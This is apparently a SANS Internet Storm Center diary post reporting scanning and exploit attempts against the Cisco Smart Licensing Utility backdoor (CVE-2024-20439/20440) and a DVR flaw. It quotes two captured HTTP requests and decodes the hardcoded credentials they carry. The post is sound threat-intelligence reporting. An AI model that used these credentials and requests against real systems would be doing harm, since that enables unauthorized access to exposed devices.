Exploit Attempts for Cisco Smart Licensing Utility CVE-2024-20439 and CVE-2024-20440

    Published: 2025-03-19. Last Updated: 2025-03-19 13:30:37 UTC
    by Johannes Ullrich (Version: 1)
    0 comment(s)

    In September, Cisco published an advisory noting two vulnerabilities [1]:

    • CVE-2024-20439: Cisco Smart Licensing Utility Static Credential Vulnerability
    • CVE-2024-20440: Cisco Smart Licensing Utility Information Disclosure Vulnerability

    These two vulnerabilities are somewhat connected. The first one is one of the many backdoors Cisco likes to equip its products with. A simple fixed password that can be used to obtain access. The second one is a log file that logs more than it should. Using the first vulnerability, an attacker may access the log file. A quick search didn’t show any active exploitation, but details, including the backdoor credentials, were published in a blog by Nicholas Starke shortly after Cisco released its advisory [2]. So it is no surprise that we are seeing some exploit activity:

    The API affected by this vulnerability can be found at /cslu/v1. One of the sample requests:

    GET /cslu/v1/scheduler/jobs HTTP/1.1
    Host: [redacted]:80
    Authorization: Basic Y3NsdS13aW5kb3dzLWNsaWVudDpMaWJyYXJ5NEMkTFU=
    Connection: close
     

    The base64 encoded string decodes to: cslu-windows-client:Library4C$LU , the credentials Nicholas's blog identified.

    The same group looking for this URL is also attempting several other attacks. Most are just looking for configuration files like "/web.config.zip", and interestingly, they also picked to scan for what looks like CVE-2024-0305  (but I am not sure about that. I base this on the exploit found on GitHub [3]). Other vulnerability notes suggest a different URL for this vulnerability. Either way, it is likely a vulnerability in a DVR.

    GET /classes/common/busiFacade.php HTTP/1.1
    Host: [redacted]:80
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
    Authorization: Basic aGVscGRlc2tJbnRlZ3JhdGlvblVzZXI6ZGV2LUM0RjgwMjVFNw==
    Content-Type: application/x-www-form-urlencoded
    Connection: close

    In this case, the credentials decode to: helpdeskIntegrationUser:dev-C4F8025E
    It's always fun to see how cheap IoT devices and expensive enterprise security software share similar basic vulnerabilities.

    [1] https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cslu-7gHMzWmw
    [2] https://starkeblog.com/cve-wednesday/cisco/2024/09/20/cve-wednesday-cve-2024-20439.html
    [3] https://github.com/jidle123/cve-2024-0305exp/blob/main/cve-2024-0305.py

    ---
    Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
    Twitter|HTTP recquest for /cslu/v1/scheduler/jobs with default credentials

    Keywords: cisco
    0 comment(s)
    ISC Stormcast For Wednesday, March 19th, 2025 https://isc.sans.edu/podcastdetail/9370

      Comments

      Login here to join the discussion.


      Diary Archives